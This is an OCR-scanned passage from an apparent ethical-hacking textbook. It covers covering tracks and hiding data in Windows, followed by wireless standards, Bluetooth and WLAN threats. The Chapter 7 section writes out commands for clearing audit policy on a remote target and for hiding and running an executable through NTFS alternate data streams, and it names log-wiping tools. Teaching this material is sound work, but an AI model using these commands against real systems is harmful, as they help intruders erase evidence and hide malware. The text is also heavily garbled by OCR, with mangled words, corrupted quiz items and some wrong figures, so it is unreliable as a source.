rootkit, it can no fonger be trusted. A rootkit alters the behavior of a system to such a degree that the information being returned by the system itself has to be considered bogus. 182 PART 2 A Technical Overview of Hacking NOTE Rootkits are a form of what is known as malware, which includes software such as viruses, worms, spyware, and other related miscreants. Above alL a rootkit is an Explication and as such can be run with a lool such PsLxec and run remotely on a target system . Of course, running a rootkit is one thing: obtaining one is quite another, Currently there exist many ways to get a rootkit — whether it is from a Web site or through a development tool designed to help nonprogrammers create basic root kits. Covering Tracks NOTE An attack that can be detected is an attack that can be stopped, which is not a good result for an attacker To stop an attack from heing detected, attackers need to cover their tracks as completely and effectively as possible. Covering tracks needs to be a systematic process in which any evidence of the attack is erased lo include logons, log files, error messages, files, and any other evidence that may tip off the owner of the system thai something has occurred. Disabling Auditing One of l he best ways to cover your tracks is to not leave any in the iirsl place. In this case, disabling auditing is a way to do Just that. Auditing is designed to allow the detection and tracking of events that are occurring on a system. If auditing is disabled, an attacker can deprive the system owner of delecting the activities tliEit have heen carried out. When auditing is enabled, all events that the system owner chooses to track to will be placed in the Windows Security Log and can be viewed as needed. An attacker can disable it with the auditpol command included with Windows, Using the NULL session technique seen earlier, you can attach to a svsteni remotely and run the command as follows: A prepared defender of a system will regularly check event logs to note any unusual activity such as a change in audit policy. Additionally a host-based intrusion detection system (IDS) will detect changes in audit policy and in some cases re-enable it. auditpol \<ip address of target> /cleai It is also possible for an attacker to perform what amounts lo the surgical removal of entries in the Windows Security Log using tools such as the following: • Dumpel • Elsave ■ WinzEipper Of course, clearing audit logs isn’t the only way to clear tracks hecause attackers can use rootkits. Using techniques that will be discussed later, you can thwart rootkits to a certain degree, but once rootkits make their way onto a system, sometimes the only reliable way to ensure that a system is free of them is to rebuild that system. CHAPTER 7 En time ration and C omputer System Hacking 183 NOTE ADS is available only on NTFS volumes, although the version of NTFS does not matter. This feature does not work on other file systems. Data Hiding There are other ways to hide evidence of an attack, such as hiding the files placed on the system. Operating systems provide many methods that can be used to hide files, including file attributes and alternate data streams. File attributes are a feature of opertiting systems that allow files to be marked as having certain properties, including read-only and hidden. Files can be flagged as hidden, making for a convenient way of hiding data and preventing detection through simple means such as directory listings or browsing in Windows Explorer. Hiding files in this way does not provide complete protection, however, because more advanced detective techniques can uncover files hidden in this manner. Another lesser known way of hiding files in Windows is Alternate Data Streams (ADS), which is a feature of the New Technology File System {NTFS). Originally, this feature was designed to ensure interoperability with the Macintosh Hierarchical File System (HPS), but has since been used by hackers. ADS provides the ability to fork or hide Eile delta within existing iiles without altering the appearance or behavior of a file in any way. In fact, when ADS is used, a file can be hidden from all traditional detection techniques as well as dir and Windows Explorer. In practice, the use of ADS is a major security issue because it is nearly a perfect mechanism for hiding data. Once a piece of data is embedded using ADS and is hidden, it can lie in wait until the attacker decides to run it I Liter on. The process of creating an ADS is simple: type ninja.exe > smoke , doc : ninja .exe Executing this command will take the file ninja.exe and hide it behind the lile smoke.doc. At this point, the iile is streamed. The next step would be to delete the original file that you just hid, specifically ninja.exe. As an attacker, to retrieve the file the process is as simple as the following: start smoke .doc: ninja.exe This command has the effect of opening the hidden file and executing it. As a defender, this sounds like bad news because files hidden in this way are impossible to detect using most means. But with the use of some advanced methods they can be detected. Some of the tools that can be used to do this include: Sfind — A forensic tool for finding streamed files ■ LNS — Used for finding ADS si reamed iiles • Tripwire — Used to detect changes in files, this tool by nature can detect ADS Depending on the version of Windows and the system settings in place, an attacker can clear events completely from an event log or remove individual events. 184 PART 2 A Technical Overview of Hacking (A SEE ■- CHAPTER SUMMARY Enumeration is the process of gathering more detailed information from a target system. Whereas previous information has been gathered without disturbing the target, with enumeration the target is being Interacted with, and more detailed itiformaticm i* bciny rtM uni^d. hifbrmutmri ex tr tic [ed from u target n\ thus point Includes usernames, group information, share 1 names, and other details. Once the attacker has completed enumeration, he or she begins system hacking. In the system hacking phase, the attacker starts to use the Information gathered from the enumeration stage by hacking the services, This stage represents the point at which the attacker is compromising the system. An attacker who wants to perform more aggressive actions or needs greater access can perform a process known as privilege escalation. In this stage, the attacker gains access to a user account or system and attempts to grant it more access than it would otherwise have by resetting passwords of accounts that have more access or installing software that grants this level of access. Finally, the attackers cover up their tracks to avoid detection and action by possible counter measures. They can stop auditing, clear event logs, or surgically remove events from the logs to make things look less suspicious. In this last phase, attackers eliminate the traces of their attack lis completely as possible leaving few (If any ) behind. KEY CONCEPTS AND TERMS Backdoor Rootkit Enumeration Keylogger Security Account Manager (SAM) Simple Network Management NULt session Password cracking Privilege escalation Rainbow table Protocol (SNMP) Spy ware Virus CHAPTER? Enurne ration a nd Computer System Hacking 185 CHAPTER 7 ASSESSMENT 1. Enumeration discovers which ports are open, A. True 14, False 1. What can Enumeration discover? A, Services B, User accounts C, Forts D, Shares 1. involves increasing access on a system, A. System hacking B, Privilege escalation C En timer ati on 1. liuckdoor Is the process of exploiting services on a system. A, System hacking B, Privilege escalation C, Enumeration D, Backdoor 1. How are brute-force attacks performed? A. By trying all possible combinations of characters B, By trying dictionary words C By capturing hashes 11 By comparing hashes 1. A Is an offline attack. A. Cracking attack B. Rainbow attack C. Uirl Inlay iitlack 11 Hashing attack 1. An attacker can use a| n) to a system. LM I • I. , fi. A replaces and alters system files, changing the way a system behaves at a fundamental level. A. Kootklt li. Virus C. Worm D, Trojan 1. A NLLL session is used to attach to Windows remotely, A. True B. False 1. Ain) • A • is used to reveal passwords. is used to store a password. A. NULL session B. Hash C. Rainbow table; \1 RoOLktl 12, A is a file used to store passwords. A. Network B. SAM C. Database ll NetBIOS Wireless Vulnerabilities WIRELESS COMMUNICATION and networking technologies have seen rapid growth and adoption over the past few years. Businesses and consumers have adopted wireless technologies for their ability to allow users to be more mobile, unencumbered by wires. Additionally, adopters have taken to the technology because it can allow connections to computers in areas where wires cannot reach or would be expensive to install. Wireless has become one of the most widely used technologies by both consumers and businesses and will most likely continue to be so. While wireless offers many benefits, one of the concerns of the technology Is security. Wireless technologies have many security issues that must be addressed by the security professional. The technology has traditionally suffered from poor or even ignored security features by those who either adopted the technology too quickly or didn’t take the time to understand the issues, Those organizations that did take the initiative in a lot of cases went too far, opting to ban the use of the technology instead of finding out how to secure the technology. This chapter explores how to use wireless technology In the organization, to reap its benefits but do so securely. Like any technology, wireless can be used safely; it is only a matter of understanding the tools available to make the system secure. For example, we can leverage techniques such as encryption and authentication together with other features designed to make the system stronger and more appealing to the business. With the right know-how and some work, wireless can be secured; the technology needn’t be banned. Chapter 8 Topics This chapter covers the following topics and concepts: Why wireless security is important • What the history of wireless technologies is • How to work with and secure Bluetooth • How to work with wireless local area networks (WLANs) • What the threats to Wireless LANs are • What wireless hacking tools are • ■ How to protect wireless networks Chapter 8 Goals When you complete this chapter, you will be able to: • Explain the significance of wireless security • Understand the reasons behind wireless security • Describe the history of wireless • ■ Understand security issues with cordless phones, satellite TV r and cell phones ■ See how Bluetooth works • Understand security issues with Bluetooth ■ Detail wireless LANs and how they work • Describe threats to Wireless LANs List types of wireless hacking tools • Understand how to defend wireless networks • The Importance of Wireless Security Wireless technologies have been adopted rapidly over the last decade, but security for those networks has not. As individuals and organizations looked to adopt the technology, security was dealt with in a number of different ways: either by not adopting security measures at all in some cases or by blocking the use of the technology in others. Both cases represent extremes that need not be used because wireless can be secured safely if the security vulnerabilities and issues involved are known. Wireless networks have a number of vulnerabilities that must be understood before they can be properly dealt w r ith. 188 PART 2 A Technical Overview of Hacking NOTE Except for fiber optic media,, all networks are subject to emanations in the form of electromagnetic radiation, in the case of copper cables, this emanation is a result of electrical charges flowing through the media and generating a field Emanations One of the traits of wireless networks is the way they work through the use of radio frequency (RFi or radio techniques. This is both a strength and a weakness because it allows wireless transmissions to reach out in all directions, enabling connectivity but also allowing anyone in those directions to eavesdrop. As opposed to the transmission of signals in traditional media such as copper or fiber, where someone musl bv on l h v “win. 1 ” lo listen, wireless LravvJs through [he air and can easily be picked up by anyone with a device as simple as a notebook with a wireless card. This leads to a huge administrative and security headache and it immediately makes clear the need for additional security measures. Emanations of a wireless network can be affected by a number of different factors that make the transmission go farther or shorter distances, including the following: NOTE Anything that generates radio signals on the same or related frequencies can interfere with wireless networks in some form. By extension, anything that affects the atmosphere that the signals are traveling through will cause interference. However it is also of note that interference does not mean that a network will be offline. Interference can manifest itself as low or poor performing networks. Atmospheric conditions — Warm or cold weather will affect how far a signal will go due to the changes in air density that changing temperatures cause. Building materials — Materials surrounding an access point (AP) such as metal, brick, or stone will impede a wireless signal. Nearby d evices — Other devices in the area (tor example, microwaves and cell phones) that give off RF signals or generate strong magnetic fields can affect emanations. Common Support and Availability Wireless networks have become more and more common over Liu 1 I li si lew \v;irs. bcinii shipper in ;>ll it.liii jkt ol devices and gadgets. From the early 2000s up to the current day, wireless technologies in the form of Bluetooth and Wi-Fi have become more common h with both features going from being an option to being standard equipment in notebooks and netbooks. This increased support of wireless technology can be seen even in cell phones, in which Bluetooth support became standard with Wi-Fi support following closely behind on the standard feature list of devices. FY! Consider how ubiquitous Bluetooth support is in cell phones alone. A company that wants to eliminate the use of Bluetooth would have a monumental task on its hands because just about all cell phones include this feature. In fact, in some high-security areas, employees have been forced to purchase used cell phones from years ago or go without cell phones while at work. CHAPTER 8 Wireless Vulnerabilities 189 What Is Wi-Fi? Wi-Fi is a trademark introduced in 1999 and owned by the Wi-Fi Alliance that is used to brand wireless technologies that conform to the 802.11 standard. For a product to bear the Wi-Fi logo, it must pass testing procedures to ensure it meets 802.11 standards. The Wi-Fi program was introduced due to the widespread problems of interoperability that plagued early wireless devices. Wi-Fi is commonly used to refer to wireless networking much as the name Coke is used to refer to any soft drink, but just because a device uses the 802.11 standard does not mean it is Wi-Fi (it may not have undergone testing). The widespread availability of wireless has made management and security much harder for the network and security administrator. With so many devices implementing wireless, it is now more possible that an employee of a company could bring in a wire less- en ah led laptop or other device and attach it to the network without the knowledge of an administrator In some situations, employees have decided that a company IT department that has said -t Ko wireless” is just being unreasonable and, oblivious to the security risks, have taken it upon themselves to install a wireless AP. A Brief History of Wireless Technologies Wireless technologies aren’t anything new; in fact, wireless has been around for more than a decade for networks and even longer for devices such as cordless phones. The first wireless networks debuted in the mid-1990s wttJi educational institutions, large businesses, and ernmenls lis earh, adopters, TJii’ curly networks did not resemble the networks in use today because they were mainly proprietary and performed poorly compared with today s deployments, In today’s environment, the business or consumer looking to purchase a wireless networking technology will encounter a large selection of options. Among them is the Institute of Electrical and Electronics Engineers {IEEE l 802.11 family of standards, which range from 802.11a to 802. lln. They are known collectively as Wi-Fi in standard jargon. In addition to the S02. 1 ] family of wireless standards, other wireless technologies have emerged {Bluetooth, tor example), each purporting to offer something unique. When looking at wireless networking it is easy to think of it as one standard, but this is not the case. Wireless networks have evolved into a family of standards over time; each includes unique attributes, To understand wireless, it is worth looking at the different standards and their benelits and performance. The following sections discuss the wireless standards that have been or are in use. 190 PART 2 A Technical Overview of Hacking 802.11 The 80.2.11 standard was the first wireless standard that saw any major usage out side of proprietary or custom deployments, Tt was used mainly by large companies and educational institutions that could afford the equipment, training, and implementation costs. One of the biggest problems with 802,11 that led to limited usage was performance. The maximum bandwidth was theoretically 2 megabytes per second (Mbps), in practice, it reached at best only half this speed. The 802.11 standard was introduced in 1997 and saw limited usage, but quickly disappeared* Its features included: • Bandwidth — 2 Mbps • Frequency — 2 ,4 CAva (gigahertz) • 802.11b The first widely adopted wireless technology was S02,llb, introduced two years after the original 802.11 standard. It didn’t take too long to be adopted by businesses and consumers alike. The most attractive feature of this standard is performance: 802,11b increased performance up to a theoretical 11 Mbps, which translated to a real-world speed of 6-7 Mbps, Other attractive features of the standard include low cost for the consumer and for the product manufacturer. fts features include: GTE 302.11b is being rapidly replaced in favor of 802. 1 1 g and n, but It is still very widely used and supported, with most notebooks still supporting the technology off the shelf and 802,11b APs still available. • Bandwidth — 11 Mbps • Frequency — 2 .4 Ghz • One downside of 802,11b is Interference. 802,11b has a frequency of 2,4 Chz h the same frequency as other devices such as cordless phones and game controllers, so these devices can interfere with 802.11b, Additionally interference can be caused by home appliances such as microwiivi 1 ovens. 802.11a When 802. lib was being developed, another standard was created in parallel: 802.11a, It debuted around the same time as 802.11b. but never saw widespread adoption due to its high cost and lesser range. One of the largest stumbling blocks that hampered its adoption was equipment prices, so the alternative 802.11b was implemented much more quickly and is seen in more places than 802. 11a, Tothiy M02. 1 1 a is rarely seen. The 802.11a standard did offer some benefits over 802,11b, notably much g re titer bandwidth: 54 Mbps over 802. li b’s 11 Mbps. Also, 802.11a offers a higher frequency range [ S C hz)< which means less chance for interference because fewer devices operate in this range. Equally the signaling of 8(32. 11a prevents the signal from penetrating walls or other materials, allowing it to be somewhat easily contained. CHAPTER 8 Wireless Vulnerabilities 191 FYlj— | Atone point 802.11a was widely used by businesses due to the performance, -cost, and security benefits. The business world adopted wireless primarily because of its better performance and their bigger budgets. Businesses also found a unique benefit in the ability to contain the signal with standard building materials. However, today’s world has seen the replacement of 802.11a with 802. 11 g and 802.11 n networks supplemented with appropriate security technologies. The S02.ll a standard is not compatible with 802, lib or tiny other standard due to the way it is designed. APs that support 80 2, 11 a and other standards simply have internals that support both standards. Its features include: 1 1 a n d w idt h — S 4 M bp s ■ Frequency — 5 Chz 802 Jig In response to consumer and business demands for higher performance, wireless networks 802. 11 g emerged. The 8 02. 11 g standtird is a technology that combines the best of both worlds {H02.ll a and 802.11b). The most compelling feature of 802. 11 g is the higher bandwidth of 54 Mbps combined with the 2.4 Ghz frequency, This allou s lor y real cr mn^e and hacku’ard compii Utility with 802.11b (but not 802,11a}. In fact, wireless network adapters that use the 802.11b standard are compatible with 802.11 gAPs, which allowed many business and users to migrate more quickly to the new technology. Its features include: NOTE Some networks that identify themselves as 802.11b are actually 802, 11 g networks and are being identified as otherwise by a wireless card that is not aware of S02.11g. • Bandwidth — 54 Mbps • Frequency — 2 . 4 G h z 802.11 n Currently emerging in the marketplace of wireless technologies is 802,110, which increased the amount of bandwidth that was available in previous technologies up to 600 Mbps in some contigu rat ions. The 802. 11 n standard uses a new method of transmitting signals known as multiple input and multiple output (MIM0). which can iransmit multiple signals across multiple antennas. The 80 2. 11 n standard offers backward compal ihilMy u’tih 80 2. 11 g, so it will encourage adoption of the technology by consumers. Its features include: • Ban d w idt h — Up to BOO M h p s • Frequency — 2.4 Ghz • 192 P A RT 2 A Tech nical Overview of H ack i ng What’s in a Name? Tlie name Bfu&taoth may seem odd, but it does have reasoning behind it. Bluetooth got its name from a Danish Viking king named Harald Bi at land. In the tenth century, Blatland united all of Denmark and Norway under his rule, much as Bluetooth unites different technologies wireiessly. Why the name Bluetooth? King Harald apparently liked wild blueberries, which stained his teeth — leading people to call him fJ Bluetooth/’ Other Wireless Technologies While wireless networking in the form of 802,11 is probably the best known by the Ei vera ge consumer, other wireless technologies are in widespread use, including Bluetooth and WiMax. Bluetooth Bluetooth is a technology that emerged for the first lime in 1998. From the beginning. Bluetooth was designed to be a short-r tinge networking technology that could connect different devices together. The technology offers neither the performance nor the range of some other technologies, but its intention wasn’t to connect devices over long distances, Bluetooth was intended to be a connectivity technology that could allow devices to talk over a distance of no more than 10 meters with low bandwidth requirements. While the bandwidth may seem low, consider the fact that the technology is used to connect devices that do not need massive blind width like headsets and personal digital assistants (PDAs). Bluetooth falls into the category of technologies known as Personal Area Networking (PAN). WiMax A Jut wireless tee hnoJogy thai has emerged over l be last leu years is WiMax. WiMax is similar in concept to Wi-Fi, but uses different technologies. WiMax is specifically designed to deliver Internet access over the so-called last mile to homes or businesses that may not otherwise be able to get access. In theory, WiMax can cover distances up to 30 miles, but in practice ranges of 10 miles are more likely. The technology was not designed for local area networks; it would fall into the category of Metropolitan Area Networking (MAN). [■ NOTE WiMax is being adopted as a technology to cover some metropolitan areas with wireless access in an effort to offer free Internet access to the masses. Working with and Securing Bluetooth Bluetooth emerged as a concept in the mid-1990s as a way to reduce the wires and cables that cluttered offices and other environments. In 1998, the Bluetooth Special Interest Group (SIG) was created to develop the concept known as Bluetooth and to speed Us CHAPTER 8 Wireless Vulnerabilities 193 Eid option among the public. The founders of this group included technology giants such as [BM. Intel, Nokia* Toshiba, and Ericsson. After the standard was implemented, manufacturers rapidly started manufacturing all sorts of Bluetooth devices — everything from mice to keyboards to printers showed up on the market* all Bluetooth emibled, Whcit makes the technology so attractive is its flexibility. Bluetooth has been used in numerous applications including: ■ Connections between celt phones and hands-free headsets and earpieces • Low bandwidth network applications • Wireless PC input and output devices such as mice and keyboards ■ Data transfer applications • GPS connections • Bar code scanners • A replacement for infrared • A supplement to universal serial bus (USB) applications • Wireless bridging • Video game consoles • Wireless modems Bluetooth has worked very well to link together devices wirelessly, but the technology has problems with security, Bluetooth does, however* support techniques that enforce security to make using enabled devices less vulnerable, Bluetooth Security Bluetooth technology was designed to include some security measures to make the technology safer. Each mechanism that is employed can be part of a solution to make using the technology acceptable to individuals and businesses. Trusted Devices Bluetooth employs security mechanisms called ‘”trusted devices,” which have the ability to exchange data without asking any permission because they are already trusted to do so. t \ Bluetooth Everywhere The victims of Bluetooth attacks aren’t just computers, cell phones, and PDAs; they can be any type of Bluetooth-enabled system s uch as a car stereo. A new piece of software known as the Car Whisperer, for instance, allows an attacker to send and receive audio from a Bluetooth-enabled car stereo. As with any technology, the attacks will come along with every new innovation and upgrade. Device manufacturers try to anticipate every problem, but unfortunately they may be left doing firmware updates and patches later. 194 PART 2 A Technical Overview of Hacking Willi trusted devices in use, any device that is not trusted will automatically prompt the user to decide whether to allow the connection or not. A device thai is trusted in I his system should adhere to certain guidelines. It should be: • A personal device that you own such as a cell phone, PDA, media player, or other similar device • A device owned by the company and identified as such. These devices could include printers, PDAs, or similar types of devices, • An un trusted device is deiined as follows: • A device that is not under the immediate control of an individual or company is questionable. Devices that fall in this category are any public devices for which you cannot readily identify the owner nor trust the owner. The idea behind trusted devices is that unknown devices are not allowed to connect without being explicitly approved. If an unt rusted device were allowed to connect without being Eip proved, it could mean that a device could accidentally or maliciously connect to a system and gain access to the device. When working with Bluetooth-enabled devices, take special care to attach only to devices you know. Users should be taught to avoid attaching to devices that they do not know r and cannot trust. Impress upon users the difference between trusted and un trusted devices when making connections. Stress that unsolicited connection requests should never be accepted Discoverable Devices In an effort to make Bluetooth devices easy to configure and pair with ot her devices, the discoverability feature w T as added to the product. When Bluetooth devices are set to be discoverable, they can be seen or discovered by other Bluetooth devices that are in range. The problem with a device being set to be discoverable is thai It can be seen by the owners of devices who have both good and bad Intent ions. In fact, a discoverable device could allow an attacker to attach to a Bluetooth device undetected and swipe data off of it quite easily. Know Your Defaults Device manufacturers such as those who make cell phones are known to set their devices to be discoverable by default. The idea behind having it as the default mode is that the device is easier for the consumer to use right out of the box. The security issue is that a consumer may not be aware of the security risks and leave this feature enabled. Discoverability should be enabled only to pair devices and then be disabled afterward. Tnis is a technique that newer models of these devices are starting to use. CHAPTER 8 Wireless Vulnerabilities 195 Keep Your Enemies Close Bluetooth hacking may seem like less of a problem because the range of the technology is only about 10 meters. But with most things in technology and security, there is always a work-around, and Bluetooths range is. no different. A 2004 article published in Popular Science (and available on its Web site} titled “Bluetooth a Mile Away/’ discussed how to extend Bluetooths range substantially. The article showed how to modify simple, off-the-shelf components to boost the reach of Bluetooth way beyond what is specified, all for a price tag of less than$70.

A simple exercise like this shows just how an attacker can change the nature of the ” game ”
in creative ways. Attackers used to have to be in close proximity to the victim, but now they
can be much farther away.

It is getting less common to find devices set with their default mode of operation to be
discoverable. But don’t take anything ibr granted. When issuing cell phones to employees,
always check to make sure that the device is set to be nondiscoverable unless absolutely
necessary.

Bluejacking r Bluesnarfing, and Bluebugging

Bluejacking. Bluesnarimg* and Bluebugging are attacks caused by devices being discov-
erable. Bluejacking involves a Bluetooth user transmitting a business card, a form of text
message, to another Bluetooth user, If the recipient doesnt realize what the message
is, he or she may allow the contact to be added to their address book. After that, the
sender becomes a trusted user. For example. Bluejacking allows someone authorized or
unauthorized to send messages to a cell phone. The other threat posed by discoverability
is Bluesnarfing. which is used to steal data from a phone, Bluebugging is an attack in which
attackers can use the device being attacked for more than accessing data: they can use
the services of the device for purposes such as making calls or sending text messages.

Viruses and Malware

An issue that was not initially addressed when Bluetooth
debuted was viruses. Viruses were already a well-known fact
of life in the computer world, but there really was not much
leveraged the discoverability feature to locate and infect nearby
tend to use connections that require the sender to be authen-
ticated and authorized prior to accepting any data, which
severely curtails the capability of an unknown device to spread
an infection. With the technology the way it stands now,
a user must agree to open a lile and install it — diminishing
the potential threat, but not eliminating it.

NOTE

Never underestimate the creativity
and ambition of an attacker or
virus writer. They thrive in adapting
their methods to leverage new
technologies and devices, and
wireless is no different. When
Bluetooth debuted, no security was
provided because no manufacturer
perceived a threat; this opened the
door to some notable attacks later.

196 PART 2 A Technics I Overview of Hacking

While Bluetooth
manufacturers have given
us the tools to secure the
technology, it is definitely
up to us to use them.
Manufacturers may or may
not enable security features
on their devices.

MOTE

Securing Bluetooth

Bluetooth isn’t going away and .shouldn’t be shunned because
of a few security issues: the technology can be secure if used carefully.
The makers of Bluetooth have given us the tools to use the technology
safely, and these tools coupled with a healthy dose of common sense
can make all the difference.

Discovering

Ensure that discoverability on devices is disabled after pairings have
been established between devices. In practice, there is no need for
discoverability after a pairing has been made so the feature should
be shut off unless it’s needed for some other reason.

Working with Wireless LANs

Wireless LANs are built upon the Hi) 2. 11 family of standards and operate in a similar
manner to wired networks. The difference between the two beyond the obvious lack
of wires is the fundamental functioning of the network itself.

One of the big differences between wired and wireless is the way signals are trans-
mitted and received on the network.

In networks based on the Ethernet standard (802.. 3), stations transmit their
information using what is known as the Carrier Sense Multiple Access with Collision
Detection (CSMA/CD) method. Networks that use this method have stations that
transmit their information as needed, but collisions are possible when two stations
transmit at the same time. To understand the method* think of the way a phone
conversation works: Two people can talk and if they happen to talk at the same time,
neither will be able to understand what is being said. In this situation, both talkers
stop talking and wait to see who is going to talk instead. This is the same method that
CSMA/CD uses. In this setup, if two stations transmit at the same lime, a collision
takes place and is detected: then both stop and wait for a random period of time
before retransmitting.

In wireless networks based on the 802,11 standard, the method is a little different h
and is called Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA).
Networks that use this method “listen” to see whether any other station is trans-
mitting before they transmit themselves. This would be like looking both ways before
crossing the street. Much as with CSMA/CD, if a station “hears 1 * another station
transmitting, it wails a random period of time before trying again.

CSMA/CD Versus CSMA/CA

CHAPTER 8 Wireless Vulnerabilities

197

APs offer a tremendous range of capabilities that dictate how the network operates. When
choosing an AP H an organization needs to consider its goals, because choosing the wrong AP
can severely hamper the performance of the net. For example, in large enterprises the consumer
grade AP that can be purchased at an electronics retailer would be completely inappropriate
in most cases due to its inability to offer enterprise security and management features.

An item that is present in wireless networks but not in wired networks is the access point
( AP). An AP is a device that wireless clients associate to in order to gain access to the
network [more on that later). In order for a wireless client to gain access to the services
offered on the wired network on which the AP is connected, it must first associate to it.

APs come in many different types, with a diverse range of capabilities from the
consumer to commercial grade. The choice of tin AP can have a substantial impact on
the overall performance and available features of the network, including range, security,
and installation options.

Service Set Identifier (SSID)

A detail that is universally available in wireless networks is the service set identifier (SSID).
The SSID is used to uniquely identify a network, thereby ensuring that clients can locate
the correct wireless local area network (WLAN) ihm I hey should be attaching to. The SSID
is attached to each packet as it is generated and is represented as a 32-character sequence
uniquely identifying the network.

The SSID is one of the first details that wireless clients will “see** w r hen connecting
to a network, so a few things should be considered. First, in most APs the SSID is set
to a default setting such as the manufacturer’s name (for example. 4 “Linksys h ‘ or ■ L dlmk ,t ),
which should be changed to something more appropriate. Second, considerations
should be made to turn off broadcast of I he SSID where appropriate. By default in most

/ \

There has been some debate about whether turning the SSID on or off is a good idea. On one side
of the argument, turning it off makes it more difficult to locate an AP (but not impossible). In fact,
some experts have argued that turning off the broadcast isn’t even worth doing because a serious
attacker will find it more of a speed bump than a waH in finding your network. On the other hand,
turning the SSID broadcast on makes it easier for legitimate clients to find the network as well
as making t easier for an attacker to locate. The question you have to answer in your situation
is what the tradeoff of security versus convenience is for your clients and organization.

Role of APs

Off or On

198 PART 2 | A Technical Overview of Hacking

networks the SKID broadcast is turned on, which means that the ID will be b made els t
unencrypted, in beacon frames. These beacon frames allow T clients to much more
easily associate with their AR but also have the side effect of allowing software
such as Netstu m bier to identify the network and find its physical location.

Association with an AP

Before a wireless client can work with a wireless network, a process known as association
must take place. This process is actually quite simple, at least for our purposes, because
association occurs when a wireless client has the SS I I) preconiigured for the network
it is supposed to be attaching to. When it is configured in a wireless client, it will look
for and then associate to the network whose value has been configured.

The Importance of Authentication

While not required, it is desirable to make sure that only those clients that you want to
attach to your wireless netw T ork can do so. In order to restrict this access, authentication
is performed prior to ihe association process. Authentication can be performed either
in an open or preshared key situation, both offering features that may be desirable.
With open keys, no secure authentication is performed and anyone can connect. When
using this mode, no encryption is performed, so all information is sent in the clear unless
another mechanism provides this feature. In preshared key (PSK) situations, both the
AP and client have the same key entered ahead of time and therefore can authenticate
and Eissociate securely. This also has the benefit of encrypting traffic as well.

In some organizations it is possible that you may have existing tools or infrastructure
in place that can be used to authenticate wireless clients. One of these options is RADIOS
or Remote Authentication Dial-In User Service,

The RADIUS service is one that is designed to centralize authentication, authorization h
and Eiccounting, or AAA. The service allows user accounts and their authorization

levels to be stored on a single server and have all authentication and
authorization requests forwarded to this location. By consolidating
management in this manner it is possible to simplify administration
and management of the network by making a single location to carry

[n practice when a user connects to wireless access point, his or her
connection request can be forwarded to a RADIUS server. This request
is then authenticated, authorized, and recorded (accounted), and
access takes place as authorized,

Network Setup Options

Wireless networks and APs can relate in two ways: ad hoc or through infrastructure.
Each of these options has advantages and disadvantages that make them attractive
options. The following sections show you how they work.

^NOTE

wide range of operating
systems and is supported by
a wide range of enterprise
level access points.

CHAPTER 8 Wireless Vulnerabilities

199

Ad hoc networks can be created very quickly Eind easily because no AP is required in
their setup. Ad hoc networks can be thought of els peer-to-peer networks in which each
client can attach to any other client to send and receive inform a lion .These clients or
nodes become part of one network sharing a form of SSI I) known as an Independent
Basic Service Set (IBSS). While these networks are quick to set up, which is the primary
advantage, they do not scale well because they become harder to manage and less secure
as the number of clients grows.

Infrastructure Network

Infrastructure-based wireless networks are networks that use an AP that each client
associates to. Each client in the network setup will be configured to use the SSID of
the AP that will be used to send and receive inform titi on. This type of network scales
very well compared with the ad hoc-based networks and is much more likely to be used
in production environments. Additionally, infrastructure networks can scale to a much
larger degree by simply adding more APs to create what is known as an extended service
set (ESS).

Threats to Wireless LANs

Wireless networks offer many ben el its similar to wired networks, but differ in the threats
they face. Wireless networks have many threats that are unique to the way the technology
works and each must be understood thoroughly prior to deploying the proper defenses.

Wardriving

Wardriving is the process of an attacker traveling through an area with the goal of
detecting wireless APs or devices. An attacker who wants to engage in wardriving can
do so with very basic equipment, usually a notebook with a wireless card and special
software designed to detect wireless networks, In most cases those engaging in wardriving
are looking to get free Internet access; however it is more than possible for them to do
much worse, such as accessing computers on the network, spreading viruses, or even

Wardriving has led to a family of so-called “war 11 attacks that are all variations
of the same concept:

• Wa rw a I ki n g — A ttacker s use a vvirele ss-en ab I ed de v ice to de tect w ireless
networks as they walk around an area.
• War biking — Same technique as war walking, but on a bike

• Wa rf I y In (J — Relat i vely ad va n c ed te c h n iq u e i Ji a t req li i res t h e s a m e equip m ent
as wardriving* but the process uses an aircraft instead of a car

• W^i ballooning — An attacker places a GPS and wireless detection gear
on a cluster of small balloons and lets them float over an area. The device
is later retrieved and the data imported into the appropriate software.

200 PA RT 2 A Tech n ica I Overview of H ack i n g

X Marks the Spot

Another activity that occurs with ail the “war” activities is warchalking. Someone finds
a wireless network and places a marker identifying an AP on a curb, sign, wall, or other
location. Warchalkers have developed their own symbols to mark locations and the type
of AP {open, secured, and so on) that can be looked up online. The name comes from
their usage of chalk to mark symbols in these locations.

Misconfigured Security Settings

Every AP, piece of software, or associated hardware has recommended security settings
provided by the vendor by default or in the instruct ion booklet. In a vast number of cases,
such as residential or small businesses, APs end up getting implemented without these
most basic of settings configured. In some cases, such as with consumer-grade APs, the
default settings on the equipment allow the device to work “out of the box,” meaning
that those that don’t know otherwise will assume that everything is OK as is.

Unsecured Connections

Another concern with wireless security is what employees or users may be attaching
to. It has been shown that at least 25 percent of business travelers attach to unsecured
APs in locations such as hotels, airports, coffee shops, and other locations. This number
is expected to increase as companies allow more individuals to travel and work in the
field with the associated notebooks and similar dei r ices. The concern with this situation

Plug and Pray?

It is not uncommon for home users or small businesses to purchase a consumer grade
wireless router or AP and then simply plug it in and hope it works. In most cases, the
manufacturer of a given piece of hardware configures the device so it will work out of the
box to eliminate potential frustration on the part o1 the user when the device doesn’t just
plug in and work like a TV. The problem is that if a consumer plugs in a device such as
a wireless router and it already works, he or she more than likely will not take the basic
steps to secure it.

In other cases consumers have the attitude that they have nothing an attacker would
want. It is not uncommon for a user to believe that the data is what an attacker wants,,

V

CHAPTER 8 Wireless Vulnerabilities

Here, There, Everywhere

Rogue APs can appear anywhere and attackers know this — but so do businesses. Some
businesses have taken advantage of the basic human desire to get something for nothing,
such as Internet access. For example, several businesses have placed rogue APs in different
locations up and down the Las Vegas strip, tn most cases, the APs are located outside large
hotels where people will try to connect instead of paying the hotel to use their Internet.
The problem with these APs is that many of them go to only one site that may offer
anything from travel and entertainment to adult services..

is twofold: what users are transmitting and what is stored on their systems. Transmitting
information over an unsecured AP can he extremely problematic and users who leave
wireless access such as Bluetooth enabled on a notebook or cell phone may open them-
selves up to data theft or other dim yen) us situations.

Rogue APs

A problem with wireless is the appearance of rogue APs that have been installed
without authorization. The problem with rogue APs comes on a few fronts because
they are unmanaged, unknown, and unsecured in most cases. Rogue APs that
are installed without the knowledge of the IT department are by their very nature
unmanaged and have no controls placed upon them. They are known only to specific
un1i\ id – 1 a Is. ;KHb tiood and bad. I : bially. A IN installed jn 1his situation are frequently
